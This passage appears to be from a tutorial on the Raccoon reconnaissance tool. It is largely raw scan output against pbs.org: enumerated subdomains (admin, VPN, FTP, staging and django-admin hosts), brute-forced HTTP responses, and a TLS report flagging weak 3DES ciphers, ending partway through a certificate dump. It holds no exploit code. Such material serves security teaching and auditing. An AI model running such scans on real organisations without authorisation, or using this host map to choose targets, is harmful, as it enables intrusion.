detected: heart.ops.pbs.org [1;32m[v][0;0m Subdomain detected: player.pbs.org [1;32m[v][0;0m Subdomain detected: jaws.pbs.org [1;32m[v][0;0m Subdomain detected: kids.pbs.org [1;32m[v][0;0m Subdomain detected: account.pbs.org [1;32m[v][0;0m Subdomain detected: teacherline.pbs.org [1;32m[v][0;0m Subdomain detected: www-cache.pbs.org [1;32m[v][0;0m Subdomain detected: image.pbs.org [1;32m[v][0;0m Subdomain detected: admin.pbs.org [1;32m[v][0;0m Subdomain detected: koth-qa.svp.pbs.org [1;32m[v][0;0m Subdomain detected: urs.pbs.org [1;32m[v][0;0m Subdomain detected: ops.pbs.org [1;32m[v][0;0m Subdomain detected: wnet.video-staging.pbs.org [1;32m[v][0;0m Subdomain detected: weta-qa.svp.pbs.org [1;32m[v][0;0m Subdomain detected: sentry.pbs.org [1;32m[v][0;0m Subdomain detected: video.pbs.org [1;32m[v][0;0m Subdomain detected: wnet.video-qa.pbs.org [1;32m[v][0;0m Subdomain detected: www.pbs.org [1;32m[v][0;0m Subdomain detected: docs.pbs.org [93m[!][0;0m Trying to discover subdomains in Google [1;32m[v][0;0m Detected subdomain through Google dorking: KIDSto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: PBSKidsto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: Playto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: Avenueto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: Initiativeto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: shop.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: Rewireto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: YouTubeto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: to.pbs.org [93m[!][0;0m Trying to extract subdomains from DNS dumpster [1;32m[v][0;0m Found subdomain in DNS dumpster: dam-qa.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: fc.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: sentry-poc.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: dam-v6poc.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: source.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: ocsedge.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: stationexchange.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: people.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: webportal.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: dam.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: itdrvpn.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: remoteapp.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: soup.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: images.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: shares.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: adfs.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: clips.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: creativelabrequest.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: tableau.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: dam-dev.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: 3770-anlz01.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: 3770-anlz02.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: 3770-anlz03.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: 3770-anlz04.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: mediasoc.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: audio.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: mail.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: autodiscover.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: backup.vpn.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: bvweb.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: dam1-ext.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: dam2-ext.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: dns2.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: dns4.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: drlist.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: drmail.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: ed-dev.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: r53-vip.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: open.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: r53-api-vip.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: teacherline.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: www.teacherline.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: search.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: newshour.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: producers.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: misc-redirect.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: edsearch.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: excl.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: ntbvpn.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: freshdesk2smartbear.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: ftp2.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: itdr.vpn.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: listserv.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: mail.public.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: mxgw1.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: mxgw2.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: mxout.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: ntb.vpn.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: mft-v6poc.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: orion.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: pbsftp.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: primary.vpn.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: pss.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: scand01.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: techops.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: sip.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: ildbcl3.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: pbsvideodb.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: mft.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: smtp1.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: smtp2.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: stageftp.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: stwebservices.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: tlcftest.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: tllinux2.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: mobile.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: tlreal.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: videoindex.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: producersworkshop.pbs.org [1;32m[v][0;0m Found subdomain in DNS dumpster: webftp2.pbs.org [93m[!][0;0m Bruteforcing subdomains [1;34m[#][0;0m Done enumerating SubdomainsNext, we can take a look at the results from attempting to brute-force common subdomains with Raccoon's built-in wordlist, saved under "subdomain_fuzz.txt." If the website uses wildcards, we're likely to see a false positive for every attempt from the wordlist. Here, we see a limited response, indicating these are likely valid domains.[1;34m[#][0;0m Reading from list: /usr/local/lib/python3.6/dist-packages/raccoon_src/wordlists/subdomains [1;34m[301][0;0m http://beta.pbs.org redirects to https://beta.pbs.org/ [1;34m[301][0;0m http://WWW.pbs.org redirects to https://www.pbs.org/ [1;34m[301][0;0m http://blogs.pbs.org redirects to http://www.pbs.org [1;32m[200][0;0m http://admin.pbs.org [1;32m[200][0;0m http://webdisk.video.pbs.org [1;31m[405][0;0m http://sentry.pbs.org [1;34m[301][0;0m http://development.pbs.org redirects to http://www.pbs.org/development/ [1;32m[200][0;0m http://services.pbs.org [1;34m[301][0;0m http://kids.pbs.org redirects to http://pbskids.org/ [1;34m[301][0;0m http://shop.pbs.org redirects to https://shop.pbs.org/ [1;34m[301][0;0m http://api.pbs.org redirects to http://api.pbs.org/admin/ [1;32m[200][0;0m http://autodiscover.video.pbs.org [1;32m[200][0;0m http://log.pbs.org [1;34m[301][0;0m http://chrome.pbs.org redirects to http://jaws.pbs.org/ [1;34m[301][0;0m http://merlin.pbs.org redirects to http://merlin.pbs.org/django-admin/ [1;34m[301][0;0m http://login.pbs.org redirects to https://account.pbs.org/ [1;34m[301][0;0m http://www.shop.pbs.org redirects to https://shop.pbs.org/ [1;32m[200][0;0m http://autoconfig.video.pbs.org [1;34m[301][0;0m http://open.pbs.org redirects to https://open.pbs.org/ [1;32m[200][0;0m http://dev.pbs.org [1;34m[301][0;0m http://search.pbs.org redirects to http://www.pbs.org/search/ [1;34m[301][0;0m http://cgi.pbs.org redirects to http://www.pbs.org/ [1;32m[200][0;0m http://ops.pbs.org [1;34m[301][0;0m http://qa.pbs.org redirects to https://qa.pbs.org/ [1;34m[301][0;0m http://account.pbs.org redirects to https://account.pbs.org/ [1;34m[301][0;0m http://www.video.pbs.org redirects to http://video.pbs.org/ [1;34m[301][0;0m http://sales.pbs.org redirects to http://www.pbs.org/development/category/corporatesupport/ [1;34m[301][0;0m http://video.pbs.org redirects to http://www.pbs.org/video/ [1;34m[#][0;0m Reading from list: /usr/local/lib/python3.6/dist-packages/raccoon_src/wordlists/subdomains [1;34m[301][0;0m http://beta.pbs.org redirects to https://beta.pbs.org/ [1;34m[301][0;0m http://api.pbs.org redirects to http://api.pbs.org/admin/ [1;34m[301][0;0m http://WWW.pbs.org redirects to https://www.pbs.org/ [1;32m[200][0;0m http://dev.pbs.org [1;34m[301][0;0m http://account.pbs.org redirects to https://account.pbs.org/ [1;34m[301][0;0m http://video.pbs.org redirects to http://www.pbs.org/video/ [1;32m[200][0;0m http://ops.pbs.org [1;32m[200][0;0m http://admin.pbs.org [1;34m[301][0;0m http://search.pbs.org redirects to http://www.pbs.org/search/ [1;31m[405][0;0m http://sentry.pbs.org [1;34m[301][0;0m http://cgi.pbs.org redirects to http://www.pbs.org/ [1;32m[200][0;0m http://services.pbs.org [1;32m[200][0;0m http://autoconfig.video.pbs.org [1;34m[301][0;0m http://open.pbs.org redirects to https://open.pbs.org/ [1;34m[301][0;0m http://qa.pbs.org redirects to https://qa.pbs.org/ [1;32m[200][0;0m http://log.pbs.org [1;34m[301][0;0m http://shop.pbs.org redirects to https://shop.pbs.org/ [1;34m[301][0;0m http://login.pbs.org redirects to https://account.pbs.org/ [1;34m[301][0;0m http://www.video.pbs.org redirects to http://video.pbs.org/ [1;34m[301][0;0m http://www.shop.pbs.org redirects to https://shop.pbs.org/ [1;32m[200][0;0m http://webdisk.video.pbs.org [1;34m[301][0;0m http://blogs.pbs.org redirects to http://www.pbs.org [1;34m[301][0;0m http://chrome.pbs.org redirects to http://jaws.pbs.org/ [1;34m[301][0;0m http://development.pbs.org redirects to http://www.pbs.org/development/ [1;34m[301][0;0m http://sales.pbs.org redirects to http://www.pbs.org/development/category/corporatesupport/ [1;34m[301][0;0m http://kids.pbs.org redirects to http://pbskids.org/ [1;34m[301][0;0m http://merlin.pbs.org redirects to http://merlin.pbs.org/django-admin/ [1;32m[200][0;0m http://autodiscover.video.pbs.orgNext, we can examine the way the website encrypts its traffic by opening the "tls_report.txt" file.[1;34m[#][0;0m Started collecting TLS data for pbs.org [1;34m[#][0;0m Done collecting TLS data [1;32m[v][0;0m Supported Ciphers: | TLSv1.0: | ciphers: | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A | TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 2048) - A | TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A | TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 2048) - A | TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C - [1;31mWEAK[0;0m | compressors: | NULL | cipher preference: server | warnings: [1;31m| 64-bit block cipher 3DES vulnerable to SWEET32 attack[0;0m | TLSv1.1: | ciphers: | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A | TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 2048) - A | TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A | TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 2048) - A | TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C - [1;31mWEAK[0;0m | compressors: | NULL | cipher preference: server | warnings: [1;31m| 64-bit block cipher 3DES vulnerable to SWEET32 attack[0;0m | TLSv1.2: | ciphers: | TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A | TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (dh 2048) - A | TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (dh 2048) - A | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A | TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (dh 2048) - A | TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 2048) - A | TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (dh 2048) - A | TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - A | TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - A | TLS_RSA_WITH_AES_128_CBC_SHA256 (rsa 2048) - A | TLS_RSA_WITH_AES_256_CBC_SHA256 (rsa 2048) - A | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A | TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 2048) - A | TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C - [1;31mWEAK[0;0m | compressors: | NULL | cipher preference: server | warnings: [1;31m| 64-bit block cipher 3DES vulnerable to SWEET32 attack[0;0m |_ least strength: C -------------------------------------------------------------------------------- SNI Data: TLSv1: True TLSv1.1: True TLSv1.2: True SANs: --------------- ops.pbs.org sentry.pbs.org www-cache.pbs.org jaws.pbs.org video.pbs.org image.pbs.org player.pbs.org login.pbs.org pbs.org admin.pbs.org teacherline.pbs.org git.pbs.org dipsy-tc.pbs.org koth-qa.svp.pbs.org heart.ops.pbs.org account.pbs.org weta-qa.svp.pbs.org wnet.video-qa.pbs.org www.pbs.org wnet.video-staging.pbs.org docs.pbs.org projects.pbs.org whut-qa.svp.pbs.org ga.video.cdn.pbs.org kids.pbs.org urs.pbs.org --------------- Certificate: Data: Version: 3 (0x2) Serial Number: 03:f2:63:93:70:71:b1:fd:40:cc:f7:e9:dc:c3:b2:30:11:97 Signature Algorithm: sha256WithRSAEncryption Issuer: C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X3 Validity Not Before: Jul 5 08:31:20 2018 GMT Not After : Oct 3 08:31:20 2018 GMT Subject: CN = www.pbs.org Subject Public Key Info: Public Key Algorithm: rsaEncryption Public-Key: (2048 bit) Modulus: 00:b4:f6:7a:b6:8e:5c:da:54:50:bd:e5:d2:d7:de: b8:a0:fb:4f:c1:61:71:85:b0:1d:8c:5b:f8:51:59: 4d:da:62:c3:bc:48:47:49:6d:72:f2:11:eb:cb:f3: 6a:de:fe:fe:e4:59:56:e2:1e:07:91:17:33:b4:38: 11:b0:47:9d:32:a0:f1:bf:2d:5e:49:b6:77:16:e2: 17:78:6e:87:7a:3a:8d:d3:d7:b8:0b:34:5a:1f:28: 27:f9:66:f3:11:0f:b1:c1:24:d1:57:f2:28:e5:76: c6:cb:fe:87:b3:45:45:ee:e5:28:56:d1:52:80:d2: 98:3b:4a:3e:ec:bc:ab:4b:9c:cc:e7:9d:9b:73:19: 92:4c:16:b1:18:99:64:18:b1:22:eb:fa:15:09:aa: 7a:6d:d1:43:c3:fe:50:e8:d5:af:a0:09:57:01:08: 4c:d2:3d:ee:75:a1:ee:12:d2:72:c9:51:40:26:cd: 25:78:f6:eb:c9:6a:7f:da:9f:e5:a8:09:a5:3a:a8: 9e:2d:57:d5:56:9d:80:c7:e4:91:82:69:c2:4a:de: 58:2c:e8:a0:6e:3f:24:a5:74:41:94:a2:b1:47:13: 16:0e:40:02:30:7f:e7:23:1d:60:f2:c2:6f:8b:18: b2:e0:d5:68:fe:e1:92:3a:24:1e:bb:94:59:40:f3: 6c:cb Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 76:AD:A5:A1:7C:26:43:2E:5B:91:7F:42:72:21:FE:3C:FA:4F:48:3A X509v3 Authority Key Identifier: keyid:A8:4A:6A:63:04:7D:DD:BA:E6:D1:39:B7:A6:45:65:EF:F3:A8:EC:A1 Authority Information Access: OCSP - URI:http://ocsp.int-x3.letsencrypt.org CA Issuers - URI:http://cert.int-x3.letsencrypt.org/ X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org User Notice: Explicit Text: This Certificate may only be relied upon by Relying Parties and only in accordance with the Certificate Policy found at https://letsencrypt.org/repository/ CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : DB:74:AF:EE:CB:29:EC:B1:FE:CA:3E:71:6D:2C:E5:B9: AA:BB:36:F7:84:71:83:C7:5D:9D:4F:37:B6:1F:BF:64 Timestamp : Jul 5 09:31:20.892 2018 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:B9:61:FB:EC:BB:91:DA:DD:F3:F0:48: D4:61:B8:CB:09:A0:7F:20:6C:B7:1F:13:7B:EE:11:5C: 4F:CF:0E:6B:63:02:21:00:EC:C2:21:16:6E:90:E0:DA: FC:02:9A:FC:5A:3A:D0:92:38:8B:83:39:83:1D:3B:A9: FE:58:06:2C:4D:BF:74:3B Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:3C:51:96:54:C8:39:65:BA:AA:50:FC:58:07:D4:B7: 6F:BF:58:7A:29:72:DC:A4:C3:0C:F4:E5:45:47:F4:78 Timestamp : Jul 5 09:31:20.909 2018 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:A0:6B:4C:3D:0C:E3:35:B3:71:E1:E5: F2:70:89:7D:CD:A4:BA:F7:16:12:48:C5:A9:E7:DA:3A: EB:B3:E2:BB:46:02:21:00:95:29:A4:22:F5:A3:B0:66: C7:1A:71:1C:F9:95:6A:69:85:56:8B:08:E1:C8:3C:E7: 3B:23:1D:A2:D4:5B:F3:0C Signature Algorithm: sha256WithRSAEncryption 4f:ea:24:2f:7f:a9:a9:30:98:c4:61:b9:a2:eb:d3:93:87:43: 9d:b8:63:0a:2b:5a:cd:a4:cc:48:aa:c1:8d:35:2c:7c:8a:32: 9f:0b:f6:6f:d3:40:ab:d6:ae:df:d2:11:d5:ee:14:4f:43:64: 9d:f6:dd:77:7f:cb:39:a4:0a:db:d6:73:a5:c1:05:4c:d2:ac: 93:ea:61:ed:ac:12:19:2d:a2:20:0b:c9:8e:dc:9f:cb:f4:c8: fd:d6:66:be:44:c4:16:ff:c8:c9:e0:0c:d6:8d:e2:13:58:24: 9b:c8:51:c7:a0:33:41:3b:32:3d:4e:29:08:84:6e:42:d5:63: 56:ba:a7:35:89:8c:2c:6c:5c:bf:8d:75:38:3b:f4:1a:cc:3d: 2d:b8:d9:07:b5:39:78:06:4e:d3:c2:1b:45:15:e4:ff:3d:50: 2e:74:0d:c4:df:2c:19:24:04:96:21:46:98:61:47:9d:eb:a1: 55:a7:c5:72:41:0b:40:f3:80:2e:17:98:27:b6:5a:58:cf:ae: e2:d5:95:2f:b6:a9:15:7b:51:48:33:e4:a3:f2:60:3a:80:eb: 62:08:5c:08:c7:2d:9c:a2:d8:e9:3c:e4:d6:9a:f9:ae:c1:1a: d1:d4:ec:fe:1f:8f:2e:24:cc:4e:76:26:96:22:28:9c:e5:a0: 39:73:15:de -------------------------------------------------------------------------------- non-SNI Data: TLSv1: True TLSv1.1: True TLSv1.2: True SANs: --------------- ops.pbs.org sentry.pbs.org www-cache.pbs.org jaws.pbs.org video.pbs.org image.pbs.org player.pbs.org login.pbs.org pbs.org admin.pbs.org teacherline.pbs.org git.pbs.org dipsy-tc.pbs.org koth-qa.svp.pbs.org heart.ops.pbs.org account.pbs.org weta-qa.svp.pbs.org wnet.video-qa.pbs.org www.pbs.org wnet.video-staging.pbs.org docs.pbs.org projects.pbs.org whut-qa.svp.pbs.org ga.video.cdn.pbs.org kids.pbs.org urs.pbs.org --------------- Same as SNI Certificate [1;34m[#][0;0m Started collecting TLS data for pbs.org [1;34m[#][0;0m Done collecting TLS data [1;32m[v][0;0m Supported Ciphers: | TLSv1.0: | ciphers: | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A | TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 2048) - A | TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A | TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 2048) - A | TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C - [1;31mWEAK[0;0m | compressors: | NULL | cipher preference: server | warnings: [1;31m| 64-bit block cipher 3DES vulnerable to SWEET32 attack[0;0m | TLSv1.1: | ciphers: | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A | TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 2048) - A | TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A | TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 2048) - A | TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C - [1;31mWEAK[0;0m | compressors: | NULL | cipher preference: server | warnings: [1;31m| 64-bit block cipher 3DES vulnerable to SWEET32 attack[0;0m | TLSv1.2: | ciphers: | TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A | TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (dh 2048) - A | TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (dh 2048) - A | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A | TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (dh 2048) - A | TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 2048) - A | TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (dh 2048) - A | TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - A | TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - A | TLS_RSA_WITH_AES_128_CBC_SHA256 (rsa 2048) - A | TLS_RSA_WITH_AES_256_CBC_SHA256 (rsa 2048) - A | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A | TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 2048) - A | TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 2048) - A | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C - [1;31mWEAK[0;0m | compressors: | NULL | cipher preference: server | warnings: [1;31m| 64-bit block cipher 3DES vulnerable to SWEET32 attack[0;0m |_ least strength: C -------------------------------------------------------------------------------- SNI Data: TLSv1: True TLSv1.1: True TLSv1.2: True SANs: --------------- git.pbs.org login.pbs.org projects.pbs.org ga.video.cdn.pbs.org dipsy-tc.pbs.org whut-qa.svp.pbs.org heart.ops.pbs.org player.pbs.org jaws.pbs.org kids.pbs.org account.pbs.org teacherline.pbs.org www-cache.pbs.org image.pbs.org admin.pbs.org koth-qa.svp.pbs.org urs.pbs.org ops.pbs.org wnet.video-staging.pbs.org weta-qa.svp.pbs.org sentry.pbs.org video.pbs.org wnet.video-qa.pbs.org www.pbs.org docs.pbs.org pbs.org --------------- Certificate: Data: Version: 3 (0x2) Serial Number: 03:f2:63:93:70:71:b1:fd:40:cc:f7:e9:dc:c3:b2:30:11:97 Signature Algorithm: sha256WithRSAEncryption Issuer: C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X3 Validity Not Before: Jul 5 08:31:20 2018 GMT Not After : Oct 3 08:31:20 2018 GMT Subject: CN = www.pbs.org Subject Public Key Info: Public Key Algorithm: rsaEncryption Public-Key: (2048 bit) Modulus: 00:b4:f6:7a:b6:8e:5c:da:54:50:bd:e5:d2:d7:de: b8:a0:fb:4f:c1:61:71:85:b0:1d:8c:5b:f8:51:59: 4d:da:62:c3:bc:48:47:49:6d:72:f2:11:eb:cb:f3: 6a:de:fe:fe:e4:59:56:e2:1e:07:91:17:33:b4:38: 11:b0:47:9d:32:a0:f1:bf:2d:5e:49:b6:77:16:e2: 17:78:6e:87:7a:3a:8d:d3:d7:b8:0b:34:5a:1f:28: 27:f9:66:f3:11:0f:b1:c1:24:d1:57:f2:28:e5:76: c6:cb:fe:87:b3:45:45:ee:e5:28:56:d1:52:80:d2: 98:3b:4a:3e:ec:bc:ab:4b:9c:cc:e7:9d:9b:73:19: 92:4c:16:b1:18:99:64:18:b1:22:eb:fa:15:09:aa: 7a:6d:d1:43:c3:fe:50:e8:d5:af:a0:09:57:01:08: 4c:d2:3d:ee:75:a1:ee:12:d2:72:c9:51:40:26:cd: 25:78:f6:eb:c9:6a:7f:da:9f:e5:a8:09:a5:3a:a8: 9e:2d:57:d5:56:9d:80:c7:e4:91:82:69:c2:4a:de: 58:2c:e8:a0:6e:3f:24:a5:74:41:94:a2:b1:47:13: 16:0e:40:02:30:7f:e7:23:1d:60:f2:c2:6f:8b:18: b2:e0:d5:68:fe:e1:92:3a:24:1e:bb:94:59:40:f3: 6c:cb Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, 